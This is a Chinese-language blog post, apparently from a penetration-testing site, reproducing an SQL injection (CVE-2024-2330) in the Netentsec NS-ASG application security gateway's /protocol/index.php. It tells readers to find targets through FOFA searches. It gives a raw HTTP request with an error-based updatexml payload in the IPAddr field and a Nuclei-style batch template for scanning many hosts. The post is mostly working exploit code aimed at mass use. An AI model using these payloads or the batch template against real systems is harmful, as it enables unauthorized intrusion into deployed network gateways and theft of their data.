正文

网康NS-ASG应用安全网关index.php sql注入漏洞

admin
admin V管理员 /0 评论 /287 阅读
0318
此篇文章发布距今已超过586天,您需要注意文章的内容或图片是否可用!

漏洞简介

    网康科技的NS-ASG应用安全网关存在SQL注入.

漏洞复现

第一步、使用fofa语句进行资产收集...确认测试目标

第二步、访问网站首页拼接访问 /protocol/index.php 路径抓包

第三步、使用burp抓包将数据包发送到Repeater中修改数据包进行测试

POST /protocol/index.php HTTP/1.1Host: x.x.x.xCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82deUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 263jsoncontent={"protocolType":"addmacbind","messagecontent":["{"BandIPMacId":"1","IPAddr":"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='","MacAddr":"","DestIP":"","DestMask":"255.255.255.0","Description":"Sample+Description"}"]}

批量脚本

id: CVE-2024-2330info:  name: 网康NS-ASG应用安全网关index.php sql注入漏洞  author: kali  severity: critical  description: Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。  metadata:    max-request: 1    fofa-query: app="网康科技-NS-ASG安全网关"    verified: truerequests:  - raw:      - |+        POST /protocol/index.php HTTP/1.1        Host: {{Hostname}}        Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0        Accept: */*        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Sec-Fetch-Dest: empty        Sec-Fetch-Mode: cors        Sec-Fetch-Site: same-origin        Te: trailers        Connection: close        Content-Type: application/x-www-form-urlencoded        Content-Length: 263        jsoncontent={"protocolType":"addmacbind","messagecontent":["{"BandIPMacId":"1","IPAddr":"eth0'and(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))='","MacAddr":"","DestIP":"","DestMask":"255.255.255.0","Description":"Sample+Description"}"]}    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains((body), 'error') && contains(body,'6cfe798ba8e5b85feb50164c59f4bec')"

        


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com